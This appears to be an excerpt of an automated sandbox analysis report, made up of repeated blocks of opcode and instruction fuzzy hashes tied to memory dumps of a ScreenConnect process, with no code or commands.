                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9c4583d4967a5ee3e9652135132e15e660d1abcfaaacf49d3cf0c00dfe6e46eb
                                                                                                                                                                                                                                          • Instruction ID: bb15d17e63e57e80dd2bf3dd4c18a114d69196a9383aec4446d5aabbe0477038
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c4583d4967a5ee3e9652135132e15e660d1abcfaaacf49d3cf0c00dfe6e46eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62311A70A00701CFD730DF2AC85496ABBF5EF8A324B148A29D456DB7A5DB31E946CF80
Memory Dump Source
• Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.3277910641.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_143d000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f43a949c5580e62548bc329a7205bd60e62fc4090d1d53eba583df27528acc1a
                                                                                                                                                                                                                                          • Instruction ID: b0c21f8f2431b35e735e5e99c97a930b839a79c761675f2d26e9aa1d5492f19e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f43a949c5580e62548bc329a7205bd60e62fc4090d1d53eba583df27528acc1a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E21F3316006058FDB00DF68EC828EDBBB5FF85210B10C26AD2499B365DB35AD06CFD1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 47138ce277ec09dacaf56d6fba891233bf86bdfccd9e8bbd67cebbd5fa9645aa
                                                                                                                                                                                                                                          • Instruction ID: 3a5312ed13e01b6a9b2053e21574bb513009c09fcd24e8a1512ff953c693f9d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47138ce277ec09dacaf56d6fba891233bf86bdfccd9e8bbd67cebbd5fa9645aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C115C30A402059FEB24CF58C999AEEBBF5EF89304F14445AE406B7395DB7A9D01CB91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f3162fa5da4f3d35f6b8844ff6906919b8222ce21d37cf609525c3592f6751a5
                                                                                                                                                                                                                                          • Instruction ID: 097397dde9fd994ed63c2349d4773ea251ab993b935316f72e13abfe03df3734
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3162fa5da4f3d35f6b8844ff6906919b8222ce21d37cf609525c3592f6751a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91115B76B012149FCB44EB7DC89157EB6E6EF886507584039E809EB344EE39ED028BE0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e453aea59b9c5d81c077ea9029a898ce0246e7746dc628233c1e355c14b1a9a4
                                                                                                                                                                                                                                          • Instruction ID: 09791fa013cb8aa920b8919963b213d6d500161fcbcfc05681069ea721123946
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e453aea59b9c5d81c077ea9029a898ce0246e7746dc628233c1e355c14b1a9a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE21E1B5E00226CFCB24DF68D9484AEBFB1FF89225714816AD91AD7354EB36DC02CB51
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0b60836cdd516dc5dc27a5d1a1e10fd9362faad6084796d2046099ddcea57cb1
                                                                                                                                                                                                                                          • Instruction ID: 7f56ef76cf515bbb3b1bb02cd60c9c680a4ceb9e9627a3aca4c30909a41b777e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b60836cdd516dc5dc27a5d1a1e10fd9362faad6084796d2046099ddcea57cb1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C12125B6C00249DFDB10CF9AC884ADEBFB5FB88320F148519E919A7211C339A556DFA1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3437d0643997f8b9c3274f633251d7ebf72f3da9d514af6f5c0aa03bf88d9ef9
                                                                                                                                                                                                                                          • Instruction ID: 38a5ba88977b88f3fe8b14eb905d4e67657b38adbe943a5dd9de9b2dc3f106fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3437d0643997f8b9c3274f633251d7ebf72f3da9d514af6f5c0aa03bf88d9ef9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79217A30600605CFD734CF6AC85499ABBF1EF88360B148A2CD592976A0DB32E95ACF90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d968a1ae67027aa4e336723c91a39605881b0c8efed6973b37daca8ec97d9a34
                                                                                                                                                                                                                                          • Instruction ID: b30b8c99892e66392c562f9b5e72077f880dd19a32e428cf2cce33a04e0d838f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d968a1ae67027aa4e336723c91a39605881b0c8efed6973b37daca8ec97d9a34
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45214C31D10B0A8ECB11EFB8D8505EEFBB0EF99210B11C62AD598A7111FB7092968781
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 14aa7dc4d1bcb5753035d9f7d3179e31e0e5985f52e8aefa64da4e7ad6f80d0d
                                                                                                                                                                                                                                          • Instruction ID: 18e7f623635f5cdf6c05d0c2b5398b25899a4ef50c87e21950ccd2a43471cd0c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14aa7dc4d1bcb5753035d9f7d3179e31e0e5985f52e8aefa64da4e7ad6f80d0d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C42192B4F401099FDB05DFA8E8A989EBB71FF85204B1444EAD605B7360EB34AD16CF91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          • Instruction ID: c548432ad0df706b7a2bd0cc8877ae57777e66c009ab3810d878a78b1f3734c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c006a688068733cc70363146be2e7d9505ef75efbc25d7515c127ac5d0e2e59e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA2103B6C006099FDB20DF9AC444BEEFBF5EB48320F14842AE918A7250D379A545CFA5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3388f29e82561aff13fbdc96a2c2c2b5653760d912b2fae9e94eacac4853f731
                                                                                                                                                                                                                                          • Instruction ID: 1af10ecea29e83d786441b2de47e9ebe17eb93162710302a5ba81ba35d672c91
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3388f29e82561aff13fbdc96a2c2c2b5653760d912b2fae9e94eacac4853f731
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F82190B0F4010A9FDB04DFA8D46885EBBB6FF88204F1444A9D605B7364EB34AD05CF91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3277910641.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_143d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                          • Instruction ID: c6282465b9c47d151c39c5115e35d1f5da76f8aa43f6de686797261656ccc582
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E11DF76804280CFDB13CF54D9C4B16BF72FB88314F24C5AAD9090B266C336D45ACBA2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 406b6cb6c1df343b6587729fd63fda66a61b818a3366fbd4cf897b26a6a70378
                                                                                                                                                                                                                                          • Instruction ID: 7bca3916c017aa000c103215401bbddfb87a82f9ff90ed359c57e9d9634d5cb7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 406b6cb6c1df343b6587729fd63fda66a61b818a3366fbd4cf897b26a6a70378
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13117036A001069FCB01CF98D9909CDBBB1FF45314B1581AAD505BF125D632AD0BCBA0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e49fec56153f02ebb08513518b73b3e09a75dab3850edf80b67415a67dba7f1f
                                                                                                                                                                                                                                          • Instruction ID: fdf1a68266382ee2889b8b2a36feb2ceab3c13eb4e05f698ba76d2e9cb0a65f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e49fec56153f02ebb08513518b73b3e09a75dab3850edf80b67415a67dba7f1f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE116171F40205AFDB25CA6DC800AABBBF6FFC8304F14856AD554D7254D7B29A41CB91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9c601076850adfbfb6c0df4ceeabfce8b219cb049916082b1b23847e34f852eb
                                                                                                                                                                                                                                          • Instruction ID: 01e02c14c51de8e5f73ba777a82381b04241dedcb9890bd95840a1f5cb8e2526
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c601076850adfbfb6c0df4ceeabfce8b219cb049916082b1b23847e34f852eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 470184357006129F8B20DF59D49451BB7E6BB8C6543144059D95A8B314DF30FD02CBC1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 27e4665665ce0f69fb8008ade2ba2136ae661d27ef393efc7af3ddd1d0303f46
                                                                                                                                                                                                                                          • Instruction ID: 203da8d320784c7ae1a1f24453ada4a58915d058fbcb1a4a1905c8016ac31bf1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27e4665665ce0f69fb8008ade2ba2136ae661d27ef393efc7af3ddd1d0303f46
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21111C31E402198FDF18DBA8D961AEDBBB1EF89310F000469D106BB374DB791D44CBA4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f2689f76c1f5eae4fe572e6bed8475326b65a7737fe07c85d8261dd6d095779c
                                                                                                                                                                                                                                          • Instruction ID: f94a10051654d8ab9609e9e3e39353a256a4ebc436934386f5da84e38fc3517d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2689f76c1f5eae4fe572e6bed8475326b65a7737fe07c85d8261dd6d095779c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61113C71D412188FDF19DBA8D9A5BDDBBB1EF48310F00142AD102BB2A4DA791D41CBA5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5d8c393ebd51334ea1ccd1e43c4ee6bad1913199e6d7eb48208690b67c0f0523
                                                                                                                                                                                                                                          • Instruction ID: 548534b7d06950d20db275d4fe014b4eff8ea91c0e0fa37526cb1c9546cda186
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 04766dc792a0d029b1ed48e21c03beddcb3b2c6ff45d0b52a1f482bb9db6d6a8
                                                                                                                                                                                                                                          • Instruction ID: 823e63c2b1cd53501b4190128a5376c6fc168c7c0526d8ac65f62c4b550c529c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04766dc792a0d029b1ed48e21c03beddcb3b2c6ff45d0b52a1f482bb9db6d6a8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D011D76B0011A9B8F14DA99D8149EFBBB9EB84225B008537E919E7204E734AA158BE1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a6fbbc59a89f4e4b9a6f0a5a68092d1d53a585a53e29ea3ee2ebb66181e4c6ec
                                                                                                                                                                                                                                          • Instruction ID: c9f64800f3cf73137a5cbe9494752ebcb74810a8767f579c943c17f6f3e8b684
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6fbbc59a89f4e4b9a6f0a5a68092d1d53a585a53e29ea3ee2ebb66181e4c6ec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BAF0C8767002005BE714DB6AA45048EFBE9EFC5214314C47FD409CF226EA32EC078BD0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a89b9e8d914037761c7bd8959310ffdf77aa4b569b8a300575996e155c3c01de
                                                                                                                                                                                                                                          • Instruction ID: 3af24f0900110b680391363ac7fad1c657ea8718ad5a2f34a7d612fc44997fd6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a89b9e8d914037761c7bd8959310ffdf77aa4b569b8a300575996e155c3c01de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A901D1353052055FC754DF6DE880D8ABFA9EF852A4314862AE458CB3A6DB71ED0AC7D0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3292966847.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_44d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 23effa1f18572b06de0a5a645b6d7746817cedd7bec4bb894d660a318d28a59b
                                                                                                                                                                                                                                          • Instruction ID: 1dac1099bdeb448574f111e22fa08aa03ceebe91a7b98d0417825c40289dd623
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23effa1f18572b06de0a5a645b6d7746817cedd7bec4bb894d660a318d28a59b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F03AB590A3899FC792DBB8C8564C9BFF4EF06220B4581DBD449DB613E3704A02CB92
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 35162b34825f005f460cff44318904762213c10ded81538d298c6dbbc8ed653c
                                                                                                                                                                                                                                          • Instruction ID: 712577fdb5cf58092155e0bafd26890f11b20471c46cffa59ac9be69525b8fe0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35162b34825f005f460cff44318904762213c10ded81538d298c6dbbc8ed653c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1012832D0015ADBCF09DFA9E9548CDBFB6EF89714F05842AD505BB264DB316906CBA0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 17f56ccffd35f3c59df0172977d18689e29728a431377346746d149e2c705d2d
                                                                                                                                                                                                                                          • Instruction ID: 61a998e2c5df3a129128ccf4e6d76f0058e42ed1a4601ea5c35453701e45ce7d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17f56ccffd35f3c59df0172977d18689e29728a431377346746d149e2c705d2d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04F0E771D011099FCB84DFA8C8856DEBBF1EF48220B148066D818E7210E236AA02CBC1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: aa8c86fff7ea8acc024ef12e060abd1a252090691c0af203b27ad6233a8e2f7b
                                                                                                                                                                                                                                          • Instruction ID: 446b1987873ac8b1f1bbc17d0eccf06ea85d4f347f1035f54dd94155581a0626
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa8c86fff7ea8acc024ef12e060abd1a252090691c0af203b27ad6233a8e2f7b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDF0826690D3D05FD317067D68648A6BFB8D9875A831E42DBD48DCB153E4059C0AC7A2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3300604123.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_6350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8f5f021b1fdddf74859c9c26a34969523fb253a73108c7a066e4a200c0ee2835
                                                                                                                                                                                                                                          • Instruction ID: 935b970e037331e9e3e8f1224791b1f3c7faaa5ed5be78d22e34ede095403f13
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f5f021b1fdddf74859c9c26a34969523fb253a73108c7a066e4a200c0ee2835
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24F02D723043012BD314A729E880D6BBBDAEB80221B08857EE44ECB322DB25EC058BC0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1f40000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 35c2e6be80c08553596d3ab7a452d3f6e94347b58b9f4bfc3736de21c6362cad
                                                                                                                                                                                                                                          • Instruction ID: 6509175c9986b4dad73ff8ec417c2408f14211bc4064a6353a3233f8bf410543
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35c2e6be80c08553596d3ab7a452d3f6e94347b58b9f4bfc3736de21c6362cad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85F08C77B0C2149FD728CABEA40169BBBEECBC4224B14C07FE54DC3740E836A4018765
Memory Dump Source
• Source File: 0000000C.00000002.3281099547.0000000001F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: false
